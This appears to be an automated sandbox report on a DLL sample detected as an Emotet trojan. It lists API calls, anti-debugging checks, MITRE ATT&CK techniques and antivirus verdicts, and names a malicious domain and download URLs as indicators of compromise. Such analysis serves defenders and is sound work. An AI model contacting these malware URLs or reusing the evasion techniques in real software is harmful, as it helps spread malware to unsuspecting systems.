Source: Binary string: oleaut32.pdbN source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbr source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000008.00000003.636702692.0000000003380000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642507283.000000000337E000.00000004.00000001.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb` source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: setupapi.pdb, source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: sfc_os.pdbG source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: sechost.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: nlaapi.pdbe source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: propsys.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000008.00000003.641893367.00000000059C1000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642418429.0000000000AB4000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651005092.00000000056B1000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbx source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: winrnr.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbc source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb5 source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdbf source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: dhcpcsvc.pdbY source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb> source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: setupapi.pdbL source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb~ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: msctf.pdb, source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbr source: WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp
Source: Binary string: winspool.pdbo source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: bcrypt.pdbt source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000008.00000003.636714132.000000000338C000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.642523716.000000000338A000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000008.00000003.641942201.00000000059C0000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642409344.0000000000AB0000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651140195.00000000056B0000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb{ source: WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: Binary string: wuser32.pdb source: WerFault.exe, 00000008.00000003.641867150.00000000057F1000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.642348712.0000000004E81000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.650931846.00000000056E1000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc.pdb} source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: cryptbase.pdbn source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdb source: WerFault.exe, 00000008.00000003.641899016.00000000059C7000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.642375738.0000000000AB7000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.651029204.00000000056B7000.00000004.00000040.sdmp
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10001100 LoadLibraryW,GetProcAddress,3_2_10001100
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_048511A0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_048511A0
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_10-1245
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: WerFault.exe, 00000008.00000002.660056693.0000000005360000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`U&
Source: WerFault.exe, 00000008.00000002.660334872.0000000005560000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.659301898.0000000004BF0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.699833686.00000000057D0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: WerFault.exe, 00000008.00000002.659997799.0000000005346000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW0
Source: WerFault.exe, 0000000C.00000002.699444115.00000000051A7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWp
Source: rundll32.exe, 0000000A.00000002.703140912.0000000000DAA000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
Source: WerFault.exe, 00000008.00000002.660056693.0000000005360000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.655141884.0000000004A10000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.697668771.00000000050DC000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: WerFault.exe, 00000008.00000002.660334872.0000000005560000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.659301898.0000000004BF0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.699833686.00000000057D0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000008.00000002.660334872.0000000005560000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.659301898.0000000004BF0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.699833686.00000000057D0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: rundll32.exe, 00000004.00000002.668093242.000000000339A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
Source: WerFault.exe, 00000008.00000002.660334872.0000000005560000.00000002.00000001.sdmp, WerFault.exe, 00000009.00000002.659301898.0000000004BF0000.00000002.00000001.sdmp, WerFault.exe, 0000000C.00000002.699833686.00000000057D0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-2269
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10001100 LoadLibraryW,GetProcAddress,3_2_10001100
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100010E0 mov eax, dword ptr fs:[00000030h]3_2_100010E0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01160456 mov eax, dword ptr fs:[00000030h]3_2_01160456
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0116095E mov eax, dword ptr fs:[00000030h]3_2_0116095E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_011A1030 mov eax, dword ptr fs:[00000030h]3_2_011A1030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01150456 mov eax, dword ptr fs:[00000030h]4_2_01150456
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0115095E mov eax, dword ptr fs:[00000030h]4_2_0115095E
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_01191030 mov eax, dword ptr fs:[00000030h]4_2_01191030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_01181030 mov eax, dword ptr fs:[00000030h]10_2_01181030
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_011B1B50 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,3_2_011B1B50
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04851A4D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_04851A4D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_03371A4D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_03371A4D
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_011B1A4D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_011B1A4D

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: veso2.xyz
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\4123.dll',#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsNative API1Application Shimming1Process Injection111Masquerading11OS Credential DumpingSecurity Software Discovery21Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Virtualization/Sandbox Evasion11LSASS MemoryVirtualization/Sandbox Evasion11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection111Security Account ManagerRemote System Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll3211NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 384021 Sample: 4123.do1 Startdate: 08/04/2021 Architecture: WINDOWS Score: 80 36 Multi AV Scanner detection for domain / URL 2->36 38 Antivirus detection for URL or domain 2->38 40 Multi AV Scanner detection for submitted file 2->40 8 loaddll32.exe 1 2->8         started        process3 process4 10 rundll32.exe 21 8->10         started        14 cmd.exe 1 8->14         started        16 rundll32.exe 9 8->16         started        dnsIp5 30 veso2.xyz 10->30 42 System process connects to network (likely due to code injection or exploit) 10->42 44 Performs DNS queries to domains with low reputation 10->44 46 Rundll32 performs DNS lookup (likely malicious behavior) 10->46 18 WerFault.exe 20 10 10->18         started        20 rundll32.exe 9 14->20         started        32 veso2.xyz 16->32 34 192.168.2.1 unknown unknown 16->34 23 WerFault.exe 9 16->23         started        signatures6 process7 dnsIp8 27 veso2.xyz 20->27 25 WerFault.exe 11 10 20->25         started        signatures9 48 Performs DNS queries to domains with low reputation 27->48 50 Rundll32 performs DNS lookup (likely malicious behavior) 27->50 process10

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
4123.dll56%VirustotalBrowse
4123.dll62%ReversingLabsWin32.Trojan.Emotet

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
10.2.rundll32.exe.d8052e.1.unpack100%AviraHEUR/AGEN.1114098Download File
10.2.rundll32.exe.11b0000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
10.2.rundll32.exe.1190000.7.unpack100%AviraTR/Dropper.GenDownload File
3.2.rundll32.exe.116052e.3.unpack100%AviraHEUR/AGEN.1114098Download File
3.2.rundll32.exe.11b0000.7.unpack100%AviraTR/Dropper.GenDownload File
4.2.rundll32.exe.3370000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
3.2.rundll32.exe.4850000.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
10.2.rundll32.exe.d823b6.2.unpack100%AviraTR/Dropper.GenDownload File
4.2.rundll32.exe.11a0000.7.unpack100%AviraTR/Dropper.GenDownload File
4.2.rundll32.exe.115052e.2.unpack100%AviraHEUR/AGEN.1114098Download File

Domains

SourceDetectionScannerLabelLink
veso2.xyz11%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://veso2.xyz/campo/r/r1F100%Avira URL Cloudmalware
http://veso2.xyz/campo/r/r1C:100%Avira URL Cloudmalware
http://crl.microsoftH0%Avira URL Cloudsafe
http://crl.microsoft0%URL Reputationsafe
http://crl.microsoft0%URL Reputationsafe
http://crl.microsoft0%URL Reputationsafe
http://crl.microsoft0%URL Reputationsafe
http://veso2.xyz/campo/r/r1100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
veso2.xyz
unknown
unknowntrueunknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://veso2.xyz/campo/r/r1Frundll32.exe, 00000003.00000002.660720123.000000000090B000.00000004.00000010.sdmptrue
  • Avira URL Cloud: malware
unknown
http://veso2.xyz/campo/r/r1C:rundll32.exe, 00000003.00000002.662513941.00000000011A4000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.668070742.0000000003372000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.667384317.0000000001150000.00000040.00000001.sdmp, rundll32.exe, 0000000A.00000002.703520436.00000000011B2000.00000002.00000001.sdmptrue
  • Avira URL Cloud: malware
unknown
http://crl.microsoftHWerFault.exe, 0000000C.00000003.697579137.0000000005109000.00000004.00000001.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://crl.microsoftWerFault.exe, 00000009.00000003.655034598.0000000004A3A000.00000004.00000001.sdmpfalse
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
  • URL Reputation: safe
unknown
http://veso2.xyz/campo/r/r1rundll32.exe, rundll32.exe, 0000000A.00000002.701579769.0000000000AAB000.00000004.00000010.sdmptrue
  • Avira URL Cloud: malware
unknown

Contacted IPs

  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Public

IPDomainCountryFlagASNASN NameMalicious

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:31.0.0 Emerald
Analysis ID:384021
Start date:08.04.2021
Start time:14:28:46
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 6m 24s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:4123.do1 (renamed file extension from do1 to dll)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:26
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.troj.evad.winDLL@12/15@3/1
EGA Information:
  • Successful, ratio: 75%
HDC Information:
  • Successful, ratio: 22% (good quality ratio 20.5%)
  • Quality average: 83.5%
  • Quality standard deviation: 29.5%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 52
  • Number of non-executed functions: 23
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated
Warnings:
Show All
  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 168.61.161.212, 20.82.210.154, 13.64.90.137, 52.155.217.156, 20.54.26.129, 20.82.209.104, 23.10.249.43, 23.10.249.26
  • Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, arc.msn.com.nsatc.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
  • Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

TimeTypeDescription
14:29:30API Interceptor1x Sleep call for process: loaddll32.exe modified
14:29:38API Interceptor3x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_8c89162c89cd9acf4ef916dd41e49245a3ef8e_c5a4189a_17580df3\Report.wer
Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:dropped
Size (bytes):13646
Entropy (8bit):3.762585176375152
Encrypted:false
SSDEEP:192:i5i/0oXANHBUZMXMed+V38RR/u7sPS274ItWcb:QiBXYBUZMXMe3R/u7sPX4ItWcb
